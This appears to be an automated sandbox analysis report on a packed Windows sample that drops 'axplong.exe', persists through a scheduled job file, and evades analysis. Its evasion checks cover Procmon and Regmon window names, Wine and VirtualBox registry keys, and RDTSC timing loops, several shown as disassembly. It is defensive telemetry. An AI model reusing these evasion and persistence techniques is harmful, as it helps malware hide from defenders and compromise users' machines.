Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1942016 > 1048576
Source: file.exe Static PE information: Raw size of wpzcbdbk is bigger than: 0x100000 < 0x1a8600

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 6.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1e466b should be: 0x1dc1a2
Source: file.exe Static PE information: real checksum: 0x1e466b should be: 0x1dc1a2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: wpzcbdbk
Source: file.exe Static PE information: section name: remsbmyf
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: wpzcbdbk
Source: axplong.exe.0.dr Static PE information: section name: remsbmyf
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0041D84C push ecx; ret 6_2_0041D85F
Source: file.exe Static PE information: section name: entropy: 7.979919668265035
Source: file.exe Static PE information: section name: wpzcbdbk entropy: 7.953456823391056
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.979919668265035
Source: axplong.exe.0.dr Static PE information: section name: wpzcbdbk entropy: 7.953456823391056
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2096D4 second address: 209714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F84B0D655F8h 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F84B0D655F6h 0x00000017 jmp 00007F84B0D65607h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 209A24 second address: 209A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 209B7F second address: 209B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 209CDC second address: 209CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 209CE2 second address: 209D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F84B0D655F8h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F84B0D655FFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 209E43 second address: 209E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 209FBB second address: 20A000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F84B0D65605h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F84B0D65606h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20A000 second address: 20A004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20A004 second address: 20A026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F84B0D6560Ch 0x0000000c jmp 00007F84B0D65606h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20A026 second address: 20A02B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DB76 second address: 20DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DB7A second address: 20DBA5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F84B0B050E7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DBA5 second address: 20DBB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DBB7 second address: 20DBBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DBBB second address: 20DBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F84B0D655F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DBD0 second address: 20DBD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DCC9 second address: 20DD01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 je 00007F84B0D65610h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F84B0D65606h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 20DEB9 second address: 20DF0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050DDh 0x0000000b popad 0x0000000c xor dword ptr [esp], 0295CE8Eh 0x00000013 sub edi, dword ptr [ebp+122D29E2h] 0x00000019 push 00000003h 0x0000001b and cx, 2506h 0x00000020 push 00000000h 0x00000022 xor si, 46FAh 0x00000027 push 00000003h 0x00000029 mov dl, 66h 0x0000002b call 00007F84B0B050D9h 0x00000030 pushad 0x00000031 jmp 00007F84B0B050E0h 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 21EC3B second address: 21EC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22E284 second address: 22E288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22E288 second address: 22E28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22C49F second address: 22C4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22C4A3 second address: 22C4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22C789 second address: 22C78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22C8B4 second address: 22C8C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22C8C3 second address: 22C8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edx 0x00000008 jbe 00007F84B0B050D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F84B0B050DEh 0x0000001a pop esi 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA28 second address: 22CA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F84B0D65605h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA42 second address: 22CA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA48 second address: 22CA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA4C second address: 22CA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA52 second address: 22CA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D655FBh 0x0000000c ja 00007F84B0D655F6h 0x00000012 jp 00007F84B0D655F6h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA79 second address: 22CA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA7D second address: 22CA97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65606h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CA97 second address: 22CA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CDA2 second address: 22CDA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CDA8 second address: 22CDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22CDC2 second address: 22CDC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22D2B9 second address: 22D2D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22DA62 second address: 22DA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22DA66 second address: 22DA73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F84B0B050D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22DE88 second address: 22DE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F84B0D655F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 22DE94 second address: 22DE99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 235C5F second address: 235C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F84B0D65607h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FC95E second address: 1FC962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FC962 second address: 1FC968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FC968 second address: 1FC98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jne 00007F84B0B050D6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jg 00007F84B0B050D6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jnc 00007F84B0B050D6h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F9552 second address: 1F9556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 239CFC second address: 239D0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 239D0E second address: 239D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F84B0D655FDh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 239D29 second address: 239D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 239E75 second address: 239E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F84B0D655F6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23A41F second address: 23A423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23A423 second address: 23A432 instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F9525 second address: 1F9552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0B050E4h 0x0000000c jo 00007F84B0B050DEh 0x00000012 jne 00007F84B0B050D6h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23AF25 second address: 23AF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23B612 second address: 23B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23B6F3 second address: 23B700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23B700 second address: 23B705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23BBF7 second address: 23BC15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0D655FCh 0x00000008 js 00007F84B0D655F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 mov dword ptr [ebp+122D396Ah], edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23BC15 second address: 23BC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23BC1B second address: 23BC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23BD83 second address: 23BD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23BD87 second address: 23BD8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23C10F second address: 23C12A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F84B0B050DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23C12A second address: 23C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F84B0D655FCh 0x0000000a jl 00007F84B0D655F6h 0x00000010 popad 0x00000011 nop 0x00000012 stc 0x00000013 xor dword ptr [ebp+12488C8Ah], esi 0x00000019 xchg eax, ebx 0x0000001a jnc 00007F84B0D65614h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jl 00007F84B0D655F6h 0x0000002a jmp 00007F84B0D65608h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23D005 second address: 23D009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23D009 second address: 23D024 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D65601h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23D024 second address: 23D0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F84B0B050E5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F84B0B050D8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 js 00007F84B0B050E4h 0x0000002e pushad 0x0000002f mov eax, dword ptr [ebp+122D2AFEh] 0x00000035 mov edi, dword ptr [ebp+122D2C82h] 0x0000003b popad 0x0000003c cmc 0x0000003d push 00000000h 0x0000003f pushad 0x00000040 movsx edi, ax 0x00000043 mov bx, D35Bh 0x00000047 popad 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F84B0B050D8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 movsx esi, dx 0x00000067 xchg eax, ebx 0x00000068 pushad 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
